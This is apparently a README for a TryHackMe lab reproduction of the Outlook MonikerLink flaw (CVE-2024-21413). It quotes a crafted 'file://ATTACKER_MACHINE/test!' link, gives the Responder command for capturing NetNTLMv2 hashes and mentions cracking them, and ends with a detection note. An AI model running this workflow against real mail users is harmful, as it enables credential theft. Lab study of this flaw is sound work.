This repository contains research notes and a high-level proof-of-concept (PoC) for CVE-2024-21413, a vulnerability observed in certain mail clients when handling SMB/moniker-style links embedded in messages. The PoC and experiments documented here were performed in a controlled lab environment on systems.# 💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC
## 🧩 Overview
> This project reproduces the MonikerLink behavior (CVE-2024-21413) in a fully isolated TryHackMe environment to show how certain hyperlink formats can cause Outlook to process a link in a way that leaks authentication attempts or leads to further exploitation. The deliverable is a PoC, and a prioritized set of mitigations and detection suggestions that security teams can apply. No live / unauthorized systems were targeted.
---
## ⚙️ Tools & Technologies
| Tool / Skill | Purpose |
|---------------|----------|
| 🐍 Python | Script development |
| 💻 Linux (Kali) | Target system |
| 🔐 Metasploit | Exploitation & access |
| 🧱 TryHackMe Lab | Controlled environment |
---
## 🚀 Setup & Execution
- Open terminal on Linux on attacking machine
- Created a python file and pasted the code [exploit.py](exploit.py)
>This code is written by CMNatic and can be found [here](https://github.com/CMNatic/CVE-2024-21413)
- I modified the code to fit with my machine's environment.
>For example, in the following line “<a href=“file://ATTACKER_MACHINE/test!” I replaced "ATTACKER_MACHINE" with the ip address of my attacking machine and in the line “server = smtplib.SMTP('MAILSERVER', 25)”, I changed "MAILSERVER" with the IP address of my victim machine.
- Then I ran th exploit.py file and got the reply saying "the email has been sent"
- To catch the netNTLMv2 (this is a hash that could be decrypted using John the ripper or other tools and plain paswords can be retrieved). So I used a tool called responder to capture the response from victim machine. The commmand to execute the responder was
> responder -I ens5
- Here -I stands for the interface and i used ens5 interface. In my case the command showed error so to resolve it i first used the following command and retried the above command and it worked
> systemctl start systemd-resolved
- Then I logged into my victim machine
- I opened outlook and opened the link within the mail i sent from attacking machine
- This way upon one click on the link the responder on my attacking machine was able to catch the netNTLMv2 hash
---
<p>This proof-of-concept exposes a nuance in Microsoft Outlook’s link handling: certain file://–style moniker links that reference SMB resources may evade Outlook’s standard filtering and provoke outbound authentication attempts. The behavior demonstrated here was reproduced in a fully controlled TryHackMe lab and highlights how seemingly benign link formats can mask network interactions. Although vendor patches and detection guidance have been issued, the underlying mechanics remain complex due to legitimate uses of the moniker/file scheme. Importantly, the activity generated by this PoC is observable at the network level (for example, in packet captures showing NTLM authentication attempts), making it amenable to forensic analysis and incident investigation.</p>
## Detection
A Yara rule has been created by Florian Roth to detect emails containing the :file:\\: element.
[4.0K] /data/pocs/0d4cd4d1b8d58b9e77bb4d95992a4f613a14e171
├── [1.2K] exploit.py
├── [3.2K] README.md
├── [177K] responder.png
└── [ 62K] wireshark.png
1 directory, 4 files